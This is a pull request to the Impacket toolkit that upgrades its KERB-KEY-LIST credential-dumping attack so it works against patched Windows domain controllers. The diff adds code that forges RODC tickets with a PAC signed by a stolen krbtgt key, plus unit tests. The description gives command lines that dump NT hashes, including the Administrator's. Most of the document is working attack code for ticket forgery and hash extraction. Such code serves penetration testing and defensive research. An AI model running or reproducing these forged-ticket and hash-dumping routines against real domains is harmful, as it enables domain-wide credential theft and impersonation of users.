### PR TITLE
keylistattack: support PAC-hardened DCs

### DIFF
--- a/examples/keylistattack.py
+++ b/examples/keylistattack.py
@@ -59,6 +59,7 @@ class KeyListDump:
         self.__kdcHost = options.dc_ip
         self.__rodc = options.rodcNo
         # self.__kvno = 1
+        self.__domainSid = options.domain_sid
         self.__enum = enum
         self.__targets = targets
         self.__full = options.full
@@ -96,6 +97,7 @@ class KeyListDump:
             self.connect()
             self.__remoteOps = RemoteOperations(self.__smbConnection, self.__doKerberos, self.__kdcHost)
             self.__remoteOps.connectSamr(self.__domain)
+            self.__domainSid = self.__remoteOps.getDomainSid()
             self.__keyListSecrets = KeyListSecrets(self.__domain, self.__remoteName, self.__rodc, self.__aesKeyRodc, self.__remoteOps)
             logging.info('Enumerating target users. This may take a while on large domains')
             if self.__full is True:
@@ -107,12 +109,20 @@ class KeyListDump:
             self.__keyListSecrets = KeyListSecrets(self.__domain, self.__remoteName, self.__rodc, self.__aesKeyRodc, None)
             targetList = self.__targets
 
+        if self.__domainSid is None:
+            logging.warning('No domain SID available; the ticket PAC will use a placeholder identity. '
+                            'PAC-hardened DCs may reject it -- provide -domain-sid in LIST mode.')
+
         logging.info('Dumping Domain Credentials (domain\\uid:[rid]:nthash)')
         logging.info('Using the KERB-KEY-LIST request method. Tickets everywhere!')
         for targetUser in targetList:
-            user = targetUser.split(":")[0]
+            user, _, ridStr = targetUser.rpartition(":") if ":" in targetUser else (targetUser, "", "")
+            try:
+                userRid = int(ridStr)
+            except ValueError:
+                userRid = None
             targetUserName = Principal('%s' % user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
-            partialTGT, sessionKey = self.__keyListSecrets.createPartialTGT(targetUserName)
+            partialTGT, sessionKey = self.__keyListSecrets.createPartialTGT(targetUserName, userRid, self.__domainSid)
             fullTGT = self.__keyListSecrets.getFullTGT(targetUserName, partialTGT, sessionKey)
             if fullTGT is not None:
                 key = self.__keyListSecrets.getKey(fullTGT, sessionKey)
@@ -158,8 +168,13 @@ if __name__ == '__main__':
     group = parser.add_argument_group('LIST option')
     group.add_argument('-domain', action='store', help='The fully qualified domain name (only works with LIST)')
     group.add_argument('-kdc', action='store', help='KDC HostName or FQDN (only works with LIST)')
-    group.add_argument('-t', action='store', help='Attack only the username specified (only works with LIST)')
-    group.add_argument('-tf', action='store', help='File that contains a list of target usernames (only works with LIST)')
+    group.add_argument('-t', action='store', help='Attack only the username specified, optionally as username:rid '
+                                                  '(only works with LIST)')
+    group.add_argument('-tf', action='store', help='File that contains a list of target usernames, one per line, '
+                                                   'optionally as username:rid (only works with LIST)')
+    group.add_argument('-domain-sid', action='store', help='Domain SID, used to build the ticket PAC (only works '
+                                                           'with LIST; obtained automatically via SAMR otherwise). '
+                                                           'Recommended against PAC-hardened DCs')
 
     group = parser.add_argument_group('authentication')
     group.add_argument('-hashes', action="store", metavar="LMHASH:NTHASH", help='Use NTLM hashes to authenticate to SMB '
@@ -211,7 +226,7 @@ if __name__ == '__main__':
                     for line in f:
                         target = line.strip()
                         if target != '' and target[0] != '#':
-                            targets.append(target + ":" + "N/A")
+                            targets.append(target)
             except IOError as error:
                 logging.error("Could not open file: %s - %s", options.tf, str(error))
                 sys.exit(1)

--- a/impacket/examples/secretsdump.py
+++ b/impacket/examples/secretsdump.py
@@ -90,11 +90,13 @@ from impacket.uuid import string_to_bin
 from impacket.crypto import transformKey
 from impacket.krb5 import constants
 from impacket.krb5.asn1 import Ticket as TicketAsn1, EncTicketPart, AP_REQ, seq_set, Authenticator, TGS_REQ, \
-    seq_set_iter, TGS_REP, EncTGSRepPart, KERB_KEY_LIST_REP
+    seq_set_iter, TGS_REP, EncTGSRepPart, KERB_KEY_LIST_REP, AuthorizationData
 from impacket.krb5.constants import ProtocolVersionNumber, TicketFlags, PrincipalNameType, encodeFlags, EncryptionTypes
 from impacket.krb5.crypto import string_to_key, Key, _enctype_table
 from impacket.krb5.kerberosv5 import sendReceive
 from impacket.krb5.types import KerberosTime, Principal, Ticket
+from impacket.krb5 import pac
+from impacket.dcerpc.v5.ndr import NDRULONG
 try:
     from Cryptodome.Cipher import DES, ARC4, AES
     from Cryptodome.Hash import HMAC, MD4, MD5
@@ -3617,17 +3619,18 @@ class KeyListSecrets:
     def dump(self):
         LOG.info('Using the KERB-KEY-LIST method to get secrets')
         self.__remoteOps.connectSamr(self.__remoteOps.getMachineNameAndDomain()[1])
+        domainSid = self.__remoteOps.getDomainSid()
         targetList = self.getAllowedUsersToReplicate()
         for targetUser in targetList:
-            user = targetUser.split(":")[0]
+            user, _, rid = targetUser.rpartition(":")
             targetUserName = Principal('%s' % user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
-            partialTGT, sessionKey = self.createPartialTGT(targetUserName)
+            partialTGT, sessionKey = self.createPartialTGT(targetUserName, int(rid), domainSid)
             fullTGT = self.getFullTGT(targetUserName, partialTGT, sessionKey)
             if fullTGT is not None:
                 key = self.getKey(fullTGT, sessionKey)
                 print(self.__domain + "\\" + targetUser + ":" + key[2:])
 
-    def createPartialTGT(self, userName):
+    def createPartialTGT(self, userName, userRid=None, domainSid=None):
         # We need the ticket template
         partialTGT = TicketAsn1()
         partialTGT['tkt-vno'] = ProtocolVersionNumber.pvno.value
@@ -3667,8 +3670,17 @@ class KeyListSecrets:
         ticketDuration = datetime.now(timezone.utc) + timedelta(days=int(120))
         encTicketPart['endtime'] = KerberosTime.to_asn1(ticketDuration)
         encTicketPart['renew-till'] = KerberosTime.to_asn1(ticketDuration)
-        # We don't need PAC
+        # PAC-hardened DCs (Server 2019+) reject a PAC-less RODC-issued ticket during
+        # the KERB-KEY-LIST exchange (KDC_ERR_TGT_REVOKED), so embed a signed PAC.
+        pacData = self._createPartialPac(userName, userRid, domainSid)
+        pacIfRelevant = AuthorizationData()
+        pacIfRelevant[0] = noValue
+        pacIfRelevant[0]['ad-type'] = constants.AuthorizationDataType.AD_WIN2K_PAC.value
+        pacIfRelevant[0]['ad-data'] = pacData
         encTicketPart['authorization-data'] = noValue
+        encTicketPart['authorization-data'][0] = noValue
+        encTicketPart['authorization-data'][0]['ad-type'] = constants.AuthorizationDataType.AD_IF_RELEVANT.value
+        encTicketPart['authorization-data'][0]['ad-data'] = encoder.encode(pacIfRelevant)
         # We encode the encripted part
         encodedEncTicketPart = encoder.encode(encTicketPart)
         # and we encrypt it with the RODC key
@@ -3681,6 +3693,107 @@ class KeyListSecrets:
         sessionKey = encTicketPart['key']['keyvalue']
 
         return partialTGT, sessionKey
+
+    def _createPartialPac(self, userName, userRid=None, domainSid=None):
+        # Build a PAC signed with the RODC krbtgt key (both checksums, like a golden
+        # ticket). userRid/domainSid come from SAMR (dump mode) or -domain-sid (LIST
+        # mode); fall back to a placeholder identity when they are unavailable.
+        if userRid is None:
+            userRid = 1000
+        if domainSid is None:
+            domainSid = 'S-1-5-21-0-0-0'
+
+        kerbdata = pac.KERB_VALIDATION_INFO()
+        fileTime = int(datetime.now(timezone.utc).timestamp()) * 10000000 + 116444736000000000
+        kerbdata['LogonTime']['dwLowDateTime'] = fileTime & 0xffffffff
+        kerbdata['LogonTime']['dwHighDateTime'] = fileTime >> 32
+        kerbdata['LogoffTime']['dwLowDateTime'] = 0xFFFFFFFF
+        kerbdata['LogoffTime']['dwHighDateTime'] = 0x7FFFFFFF
+        kerbdata['KickOffTime']['dwLowDateTime'] = 0xFFFFFFFF
+        kerbdata['KickOffTime']['dwHighDateTime'] = 0x7FFFFFFF
+        kerbdata['PasswordLastSet']['dwLowDateTime'] = fileTime & 0xffffffff
+        kerbdata['PasswordLastSet']['dwHighDateTime'] = fileTime >> 32
+        kerbdata['PasswordCanChange']['dwLowDateTime'] = 0
+        kerbdata['PasswordCanChange']['dwHighDateTime'] = 0
+        kerbdata['PasswordMustChange']['dwLowDateTime'] = 0xFFFFFFFF
+        kerbdata['PasswordMustChange']['dwHighDateTime'] = 0x7FFFFFFF
+        kerbdata['EffectiveName'] = str(userName)
+        kerbdata['FullName'] = ''
+        kerbdata['LogonScript'] = ''
+        kerbdata['ProfilePath'] = ''
+        kerbdata['HomeDirectory'] = ''
+        kerbdata['HomeDirectoryDrive'] = ''
+        kerbdata['LogonCount'] = 0
+        kerbdata['BadPasswordCount'] = 0
+        kerbdata['UserId'] = int(userRid)
+        kerbdata['PrimaryGroupId'] = 513
+        groups = [513]
+        kerbdata['GroupCount'] = len(groups)
+        for group in groups:
+            groupMembership = samr.GROUP_MEMBERSHIP()
+            groupId = NDRULONG()
+            groupId['Data'] = int(group)
+            groupMembership['RelativeId'] = groupId
+            groupMembership['Attributes'] = samr.SE_GROUP_MANDATORY | \
+                samr.SE_GROUP_ENABLED_BY_DEFAULT | samr.SE_GROUP_ENABLED
+            kerbdata['GroupIds'].append(groupMembership)
+        kerbdata['UserFlags'] = 0
+        kerbdata['UserSessionKey'] = b'\x00' * 16
+        kerbdata['LogonServer'] = ''
+        kerbdata['LogonDomainName'] = self.__domain.upper()
+        kerbdata['LogonDomainId'].fromCanonical(domainSid)
+        kerbdata['LMKey'] = b'\x00' * 8
+        kerbdata['UserAccountControl'] = samr.USER_NORMAL_ACCOUNT | samr.USER_DONT_EXPIRE_PASSWORD
+        kerbdata['SubAuthStatus'] = 0
+        kerbdata['LastSuccessfulILogon']['dwLowDateTime'] = 0
+        kerbdata['LastSuccessfulILogon']['dwHighDateTime'] = 0
+        kerbdata['LastFailedILogon']['dwLowDateTime'] = 0
+        kerbdata['LastFailedILogon']['dwHighDateTime'] = 0
+        kerbdata['FailedILogonCount'] = 0
+        kerbdata['Reserved3'] = 0
+        kerbdata['ResourceGroupDomainSid'] = NULL
+        kerbdata['ResourceGroupCount'] = 0
+        kerbdata['ResourceGroupIds'] = NULL
+
+        validationInfo = pac.VALIDATION_INFO()
+        validationInfo['Data'] = kerbdata
+
+        pacInfos = {}
+        pacInfos[pac.PAC_LOGON_INFO] = validationInfo.getData() + validationInfo.getDataReferents()
+
+        srvCheckSum = pac.PAC_SIGNATURE_DATA()
+        privCheckSum = pac.PAC_SIGNATURE_DATA()
+        srvCheckSum['SignatureType'] = constants.ChecksumTypes.hmac_sha1_96_aes256.value
+        privCheckSum['SignatureType'] = constants.ChecksumTypes.hmac_sha1_96_aes256.value
+        srvCheckSum['Signature'] = b'\x00' * 12
+        privCheckSum['Signature'] = b'\x00' * 12
+        pacInfos[pac.PAC_SERVER_CHECKSUM] = srvCheckSum.getData()
+        pacInfos[pac.PAC_PRIVSVR_CHECKSUM] = privCheckSum.getData()
+
+        clientInfo = pac.PAC_CLIENT_INFO()
+        clientInfo['Name'] = str(userName).encode('utf-16le')
+        clientInfo['NameLength'] = len(clientInfo['Name'])
+        pacInfos[pac.PAC_CLIENT_INFO_TYPE] = clientInfo.getData()
+
+        # PAC_ATTRIBUTES_INFO and PAC_REQUESTOR are required by DCs patched for
+        # CVE-2021-42287: the KDC validates that PAC_REQUESTOR's SID matches the
+        # ticket client, so it must carry the real domain SID and user RID.
+        pacAttributes = pac.PAC_ATTRIBUTE_INFO()
+        pacAttributes['FlagsLength'] = 2
+        pacAttributes['Flags'] = 1
+        pacInfos[pac.PAC_ATTRIBUTES_INFO] = pacAttributes.getData()
+
+        pacRequestor = pac.PAC_REQUESTOR()
+        pacRequestor['UserSid'] = SID()
+        pacRequestor['UserSid'].fromCanonical('%s-%d' % (domainSid, int(userRid)))
+        pacInfos[pac.PAC_REQUESTOR_INFO] = pacRequestor.getData()
+
+        pacType = pac.sign_pac(pacInfos, aes_key=self.__rodcKey,
+                               buffer_order=[pac.PAC_LOGON_INFO, pac.PAC_CLIENT_INFO_TYPE,
+                                             pac.PAC_ATTRIBUTES_INFO, pac.PAC_REQUESTOR_INFO,
+                                             pac.PAC_SERVER_CHECKSUM, pac.PAC_PRIVSVR_CHECKSUM],
+                               checksum_salt=constants.KERB_NON_KERB_CKSUM_SALT)
+        return pacType.getData()
 
     def getFullTGT(self, userName, partialTGT, sessionKey):
         ticket = Ticket()

--- a/impacket/examples/secretsdump.py
+++ b/impacket/examples/secretsdump.py
@@ -3903,9 +3903,22 @@ class KeyListSecrets:
         keyAuth = Key(cipher.enctype, bytes(sessionKey))
         decryptedTGSRepPart = cipher.decrypt(keyAuth, 8, encTGSRepPart['cipher'])
         decodedTGSRepPart = decoder.decode(decryptedTGSRepPart, asn1Spec=EncTGSRepPart())[0]
-        encPaData1 = decodedTGSRepPart['encrypted_pa_data'][0]
-        decodedPaData1 = decoder.decode(encPaData1['padata-value'], asn1Spec=KERB_KEY_LIST_REP())[0]
-        key = decodedPaData1[0]['keyvalue'].prettyPrint()
+
+        # encrypted_pa_data may hold several PA-DATA in any order (e.g. also
+        # PA-SUPPORTED-ENCTYPES), so find KERB-KEY-LIST-REP (162) by type.
+        keyListPaData = None
+        for paData in decodedTGSRepPart['encrypted_pa_data']:
+            if int(paData['padata-type']) == constants.PreAuthenticationDataTypes.KERB_KEY_LIST_REP.value:
+                keyListPaData = paData
+                break
+
+        if keyListPaData is None:
+            returnedTypes = [int(paData['padata-type']) for paData in decodedTGSRepPart['encrypted_pa_data']]
+            raise Exception("KDC response does not contain KERB-KEY-LIST-REP (type 162); "
+                            "PA-DATA types returned: %s" % returnedTypes)
+
+        decodedKeyList = decoder.decode(keyListPaData['padata-value'], asn1Spec=KERB_KEY_LIST_REP())[0]
+        key = decodedKeyList[0]['keyvalue'].prettyPrint()
 
         return key
 

--- a/impacket/examples/secretsdump.py
+++ b/impacket/examples/secretsdump.py
@@ -3699,6 +3699,8 @@ class KeyListSecrets:
         # ticket). userRid/domainSid come from SAMR (dump mode) or -domain-sid (LIST
         # mode); fall back to a placeholder identity when they are unavailable.
         if userRid is None:
+            logging.warning("No RID for user %s; the PAC requestor will use a placeholder "
+                            "identity. PAC-hardened DCs may reject it -- provide username:rid.", userName)
             userRid = 1000
         if domainSid is None:
             domainSid = 'S-1-5-21-0-0-0'

--- a/tests/misc/test_keylist_pac.py
+++ b/tests/misc/test_keylist_pac.py
@@ -1,0 +1,120 @@
+#!/usr/bin/env python
+# Impacket - Collection of Python classes for working with network protocols.
+#
+# Copyright Fortra, LLC and its affiliated companies
+#
+# All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#   Local (no-DC) tests for the KERB-KEY-LIST partial TGT built by
+#   KeyListSecrets.createPartialTGT(). Regression guard for the fix that embeds
+#   a full, RODC-signed PAC so PAC-hardened DCs accept the RODC-issued ticket
+#   (see issue #1667).
+#
+import unittest
+from binascii import unhexlify
+
+from impacket.krb5 import constants, pac
+from impacket.krb5.asn1 import EncTicketPart, AuthorizationData
+from impacket.krb5.crypto import Key, _enctype_table
+from impacket.krb5.types import Principal
+from impacket.examples.secretsdump import KeyListSecrets
+
+from pyasn1.codec.der import decoder
+
+
+class TestKeyListPac(unittest.TestCase):
+
+    RODC_KEY = 'ab' * 32          # 32-byte AES256 key, hex
+    RODC_NO = 5
+    DOMAIN = 'contoso.com'
+    DOMAIN_SID = 'S-1-5-21-1-2-3'
+    USER = 'victim'
+    USER_RID = 1103
+
+    def _build_ticket(self):
+        kl = KeyListSecrets(self.DOMAIN, 'dc01.%s' % self.DOMAIN, self.RODC_NO, self.RODC_KEY, None)
+        userName = Principal(self.USER, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
+        partialTGT, sessionKey = kl.createPartialTGT(userName, self.USER_RID, self.DOMAIN_SID)
+        return partialTGT, sessionKey
+
+    def _decrypt_enc_ticket_part(self, partialTGT):
+        cipher = _enctype_table[int(partialTGT['enc-part']['etype'])]
+        key = Key(cipher.enctype, unhexlify(self.RODC_KEY))
+        # Key usage 2 = AS/TGS-REP ticket, encrypted with the service (krbtgt) key
+        plain = cipher.decrypt(key, 2, partialTGT['enc-part']['cipher'].asOctets())
+        return decoder.decode(plain, asn1Spec=EncTicketPart())[0]
+
+    @staticmethod
+    def _parse_pac_buffers(pac_data):
+        pac_type = pac.PACTYPE(pac_data)
+        blob = pac_type['Buffers']
+        infos = {}
+        offset = 0
+        for _ in range(pac_type['cBuffers']):
+            info_buffer = pac.PAC_INFO_BUFFER(blob[offset:])
+            offset += len(info_buffer)
+            start = info_buffer['Offset']
+            infos[info_buffer['ulType']] = pac_data[start:start + info_buffer['cbBufferSize']]
+        return infos
+
+    def test_kvno_encodes_rodc_number(self):
+        partialTGT, _ = self._build_ticket()
+        self.assertEqual(int(partialTGT['enc-part']['kvno']), self.RODC_NO << 16)
+
+    def test_partial_tgt_embeds_win2k_pac(self):
+        partialTGT, _ = self._build_ticket()
+        encTicketPart = self._decrypt_enc_ticket_part(partialTGT)
+
+        authData = encTicketPart['authorization-data']
+        self.assertTrue(authData.hasValue(), 'authorization-data must be present (a PAC), not empty')
+        self.assertEqual(int(authData[0]['ad-type']), constants.AuthorizationDataType.AD_IF_RELEVANT.value)
+
+        inner = decoder.decode(authData[0]['ad-data'].asOctets(), asn1Spec=AuthorizationData())[0]
+        self.assertEqual(int(inner[0]['ad-type']), constants.AuthorizationDataType.AD_WIN2K_PAC.value)
+
+        infos = self._parse_pac_buffers(inner[0]['ad-data'].asOctets())
+        # PAC_ATTRIBUTES_INFO / PAC_REQUESTOR are required by CVE-2021-42287-patched DCs
+        for ulType in (pac.PAC_LOGON_INFO, pac.PAC_CLIENT_INFO_TYPE,
+                       pac.PAC_ATTRIBUTES_INFO, pac.PAC_REQUESTOR_INFO,
+                       pac.PAC_SERVER_CHECKSUM, pac.PAC_PRIVSVR_CHECKSUM):
+            self.assertIn(ulType, infos)
+
+        clientInfo = pac.PAC_CLIENT_INFO(infos[pac.PAC_CLIENT_INFO_TYPE])
+        self.assertEqual(bytes(clientInfo['Name']).decode('utf-16le'), self.USER)
+
+        # PAC_REQUESTOR SID must match the ticket client (domainSid-userRid)
+        requestor = pac.PAC_REQUESTOR(infos[pac.PAC_REQUESTOR_INFO])
+        self.assertEqual(requestor['UserSid'].formatCanonical(),
+                         '%s-%d' % (self.DOMAIN_SID, self.USER_RID))
+
+    def test_pac_signatures_use_rodc_key(self):
+        # The DC re-checks the PAC signatures with the RODC krbtgt key. Re-sign the
+        # extracted buffers with the same key and assert the embedded server
+        # signature matches -> the PAC is validly RODC-signed (AES256, salt 17).
+        partialTGT, _ = self._build_ticket()
+        encTicketPart = self._decrypt_enc_ticket_part(partialTGT)
+        inner = decoder.decode(encTicketPart['authorization-data'][0]['ad-data'].asOctets(),
+                               asn1Spec=AuthorizationData())[0]
+        infos = self._parse_pac_buffers(inner[0]['ad-data'].asOctets())
+
+        embedded = pac.PAC_SIGNATURE_DATA(infos[pac.PAC_SERVER_CHECKSUM])
+        self.assertEqual(int(embedded['SignatureType']), constants.ChecksumTypes.hmac_sha1_96_aes256.value)
+
+        resigned = pac.sign_pac(
+            dict(infos), aes_key=self.RODC_KEY,
+            buffer_order=[pac.PAC_LOGON_INFO, pac.PAC_CLIENT_INFO_TYPE,
+                          pac.PAC_ATTRIBUTES_INFO, pac.PAC_REQUESTOR_INFO,
+                          pac.PAC_SERVER_CHECKSUM, pac.PAC_PRIVSVR_CHECKSUM],
+            checksum_salt=constants.KERB_NON_KERB_CKSUM_SALT)
+        reInfos = self._parse_pac_buffers(resigned.getData())
+        reSig = pac.PAC_SIGNATURE_DATA(reInfos[pac.PAC_SERVER_CHECKSUM])
+        self.assertEqual(bytes(embedded['Signature']), bytes(reSig['Signature']))
+
+
+if __name__ == '__main__':
+    unittest.main(verbosity=2)

--- a/tests/misc/test_keylist_pac.py
+++ b/tests/misc/test_keylist_pac.py
@@ -119,6 +119,15 @@ class TestKeyListPac(unittest.TestCase):
         reSig = pac.PAC_SIGNATURE_DATA(reInfos[pac.PAC_SERVER_CHECKSUM])
         self.assertEqual(bytes(embedded['Signature']), bytes(reSig['Signature']))
 
+    def test_missing_rid_logs_warning(self):
+        # A missing RID falls back to a placeholder requestor SID -- warn the operator.
+        kl = KeyListSecrets(self.DOMAIN, 'dc01.%s' % self.DOMAIN,
+                            self.RODC_NO, self.RODC_KEY, None)
+        userName = Principal(self.USER, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
+        with self.assertLogs(level='WARNING') as cm:
+            kl.createPartialTGT(userName, None, self.DOMAIN_SID)
+        self.assertTrue(any('RID' in m for m in cm.output))
+
 
 class TestKeyListGetKey(unittest.TestCase):
     # getKey() must find KERB-KEY-LIST-REP by PA-DATA type, not assume it is the

--- a/tests/misc/test_keylist_pac.py
+++ b/tests/misc/test_keylist_pac.py
@@ -17,14 +17,18 @@
 #
 import unittest
 from binascii import unhexlify
+from datetime import datetime, timezone
 
 from impacket.krb5 import constants, pac
-from impacket.krb5.asn1 import EncTicketPart, AuthorizationData
+from impacket.krb5.asn1 import EncTicketPart, AuthorizationData, TGS_REP, EncTGSRepPart, \
+    KERB_KEY_LIST_REP, EncryptionKey
 from impacket.krb5.crypto import Key, _enctype_table
-from impacket.krb5.types import Principal
+from impacket.krb5.types import Principal, KerberosTime
 from impacket.examples.secretsdump import KeyListSecrets
 
-from pyasn1.codec.der import decoder
+from pyasn1.codec.der import decoder, encoder
+from pyasn1.error import PyAsn1Error
+from pyasn1.type.univ import noValue
 
 
 class TestKeyListPac(unittest.TestCase):
@@ -114,6 +118,109 @@ class TestKeyListPac(unittest.TestCase):
         reInfos = self._parse_pac_buffers(resigned.getData())
         reSig = pac.PAC_SIGNATURE_DATA(reInfos[pac.PAC_SERVER_CHECKSUM])
         self.assertEqual(bytes(embedded['Signature']), bytes(reSig['Signature']))
+
+
+class TestKeyListGetKey(unittest.TestCase):
+    # getKey() must find KERB-KEY-LIST-REP by PA-DATA type, not assume it is the
+    # first entry of encrypted_pa_data. Modern DCs also return PA-SUPPORTED-ENCTYPES
+    # (type 165) there, and the order is not guaranteed.
+
+    DOMAIN = 'contoso.com'
+    USER = 'victim'
+    SESSION_KEY = b'\x11' * 16                       # rc4_hmac session key
+    NT_HASH = unhexlify('cafebabecafebabecafebabecafebabe')
+
+    def _build_tgs_rep(self, pa_entries):
+        # pa_entries: list of (padata_type, padata_value_bytes), encoded in order.
+        etype = int(constants.EncryptionTypes.rc4_hmac.value)
+        now = KerberosTime.to_asn1(datetime.now(timezone.utc))
+
+        enc = EncTGSRepPart()
+        enc['key'] = noValue
+        enc['key']['keytype'] = etype
+        enc['key']['keyvalue'] = self.SESSION_KEY
+        enc['last-req'] = noValue
+        enc['last-req'][0] = noValue
+        enc['last-req'][0]['lr-type'] = 0
+        enc['last-req'][0]['lr-value'] = now
+        enc['nonce'] = 0
+        enc['flags'] = constants.encodeFlags([])
+        enc['authtime'] = now
+        enc['endtime'] = now
+        enc['srealm'] = self.DOMAIN.upper()
+        enc['sname'] = noValue
+        enc['sname']['name-type'] = constants.PrincipalNameType.NT_SRV_INST.value
+        enc['sname']['name-string'][0] = 'krbtgt'
+        enc['sname']['name-string'][1] = self.DOMAIN.upper()
+        enc['encrypted_pa_data'] = noValue
+        for i, (paType, paValue) in enumerate(pa_entries):
+            enc['encrypted_pa_data'][i] = noValue
+            enc['encrypted_pa_data'][i]['padata-type'] = paType
+            enc['encrypted_pa_data'][i]['padata-value'] = paValue
+
+        cipher = _enctype_table[etype]
+        key = Key(cipher.enctype, self.SESSION_KEY)
+        # key usage 8 = TGS-REP enc-part encrypted with the TGS session key
+        encPart = cipher.encrypt(key, 8, encoder.encode(enc), None)
+
+        tgsRep = TGS_REP()
+        tgsRep['pvno'] = 5
+        tgsRep['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REP.value)
+        tgsRep['crealm'] = self.DOMAIN.upper()
+        tgsRep['cname'] = noValue
+        tgsRep['cname']['name-type'] = constants.PrincipalNameType.NT_PRINCIPAL.value
+        tgsRep['cname']['name-string'][0] = self.USER
+        tgsRep['ticket'] = noValue
+        tgsRep['ticket']['tkt-vno'] = 5
+        tgsRep['ticket']['realm'] = self.DOMAIN.upper()
+        tgsRep['ticket']['sname'] = noValue
+        tgsRep['ticket']['sname']['name-type'] = constants.PrincipalNameType.NT_SRV_INST.value
+        tgsRep['ticket']['sname']['name-string'][0] = 'krbtgt'
+        tgsRep['ticket']['sname']['name-string'][1] = self.DOMAIN.upper()
+        tgsRep['ticket']['enc-part'] = noValue
+        tgsRep['ticket']['enc-part']['etype'] = int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value)
+        tgsRep['ticket']['enc-part']['kvno'] = 2
+        tgsRep['ticket']['enc-part']['cipher'] = b'\x00' * 16
+        tgsRep['enc-part'] = noValue
+        tgsRep['enc-part']['etype'] = etype
+        tgsRep['enc-part']['cipher'] = encPart
+
+        return encoder.encode(tgsRep)
+
+    def _key_list_rep_value(self):
+        ek = EncryptionKey()
+        ek['keytype'] = int(constants.EncryptionTypes.rc4_hmac.value)
+        ek['keyvalue'] = self.NT_HASH
+        keyList = KERB_KEY_LIST_REP()
+        keyList.setComponentByPosition(0, ek)
+        return encoder.encode(keyList)
+
+    def test_getkey_selects_key_list_rep_when_not_first(self):
+        # A KERB-KEY-LIST-REP (162) preceded by PA-SUPPORTED-ENCTYPES (165). The 165
+        # value is not a valid KERB-KEY-LIST-REP, so the old encrypted_pa_data[0]
+        # assumption would have decoded the wrong buffer and failed.
+        suppEnctypes = (constants.PreAuthenticationDataTypes.PA_SUPPORTED_ENCTYPES.value,
+                        b'\x1f\x00\x00\x00')
+        keyListRep = (constants.PreAuthenticationDataTypes.KERB_KEY_LIST_REP.value,
+                      self._key_list_rep_value())
+
+        raw = self._build_tgs_rep([suppEnctypes, keyListRep])
+        key = KeyListSecrets.getKey(raw, self.SESSION_KEY)
+
+        self.assertEqual(bytes.fromhex(key[2:]), self.NT_HASH)
+
+        # Regression lock: the [0] entry really is 165 and would break the old path.
+        with self.assertRaises(PyAsn1Error):
+            decoder.decode(suppEnctypes[1], asn1Spec=KERB_KEY_LIST_REP())
+
+    def test_getkey_raises_when_key_list_rep_absent(self):
+        # No KERB-KEY-LIST-REP at all -> clear error instead of IndexError.
+        suppEnctypes = (constants.PreAuthenticationDataTypes.PA_SUPPORTED_ENCTYPES.value,
+                        b'\x1f\x00\x00\x00')
+        raw = self._build_tgs_rep([suppEnctypes])
+        with self.assertRaises(Exception) as ctx:
+            KeyListSecrets.getKey(raw, self.SESSION_KEY)
+        self.assertIn('KERB-KEY-LIST-REP', str(ctx.exception))
 
 
 if __name__ == '__main__':


### PR DESCRIPTION
### Summary

The KERB-KEY-LIST attack (`keylistattack.py`) fails against PAC-hardened DCs
(Windows Server 2019+) with `User X is not allowed to have passwords replicated
in RODCs`, **even when the target is correctly in the *Allowed RODC Password
Replication Group***. This makes the tool unusable on any up-to-date domain.

Fixes #1667.

### Root cause

`KeyListSecrets.createPartialTGT()` forged the RODC partial TGT **without a PAC**
(`encTicketPart['authorization-data'] = noValue`). Since the 2021 PAC signature
enforcement (CVE-2021-42287 / CVE-2021-42278 and the follow-up full-PAC-signature
rollout), a writable DC rejects a PAC-less RODC-issued ticket during the
KERB-KEY-LIST TGS exchange and returns `KDC_ERR_TGT_REVOKED`, which the tool
reports as the misleading "not allowed to replicate" message. `getFullTGT()` /
`getKey()` are correct — the only missing piece is the PAC.

### Change

- `createPartialTGT()` now embeds a full PAC (via the existing
  `impacket.krb5.pac.sign_pac` helper) whose **server and KDC checksums are both
  signed with the RODC krbtgt key**.
- The PAC carries a **`PAC_REQUESTOR`** buffer, which CVE-2021-42287-patched DCs
  validate against the ticket client's SID. Because of that, the target **RID +
  domain SID** are now needed and plumbed through:
  - SMB / enum mode: obtained automatically via SAMR (`getDomainSid()` and the
    per-user RID already returned by `getAllowedUsersToReplicate()`).
  - `LIST` mode: a new `-domain-sid` flag and optional `username:rid` targets
    (for `-t` / `-tf`).
- `getKey()` now selects the `KERB-KEY-LIST-REP` PA-DATA by type (162) instead of
  assuming it is `encrypted_pa_data[0]`, so key extraction stays correct when the DC
  also returns other PA-DATA there (e.g. `PA-SUPPORTED-ENCTYPES`), and it raises a
  clear error if `KERB-KEY-LIST-REP` is absent.
- No change to `getFullTGT()` or `ticketer.py`.

### Testing

- End-to-end against a Windows Server 2019 DC + RODC — both modes now return NT
  hashes:
  - `keylistattack.py -kdc dc01.contoso.com -domain contoso.com -t Administrator:500 -domain-sid <SID> -rodcNo <N> -rodcKey <aes256> LIST`
  - `keylistattack.py contoso.com/user:pass@dc01.contoso.com -rodcNo <N> -rodcKey <aes256>`
- New local unit tests `tests/misc/test_keylist_pac.py` (no DC): assert the
  partial TGT carries a valid, RODC-signed PAC (`AD_IF_RELEVANT` → `AD_WIN2K_PAC`,
  the required buffers, `PAC_REQUESTOR` SID == client, and a server-signature
  round-trip), and that `getKey()` extracts the key when `KERB-KEY-LIST-REP` is
  not the first PA-DATA entry (and errors clearly when it is absent).
- `flake8` (E9/F-series) clean.

### Notes

- Complementary to, and non-overlapping with, #2169 (which adds `-rodcNo` to
  `ticketer.py`'s golden-ticket forging — a different code path).

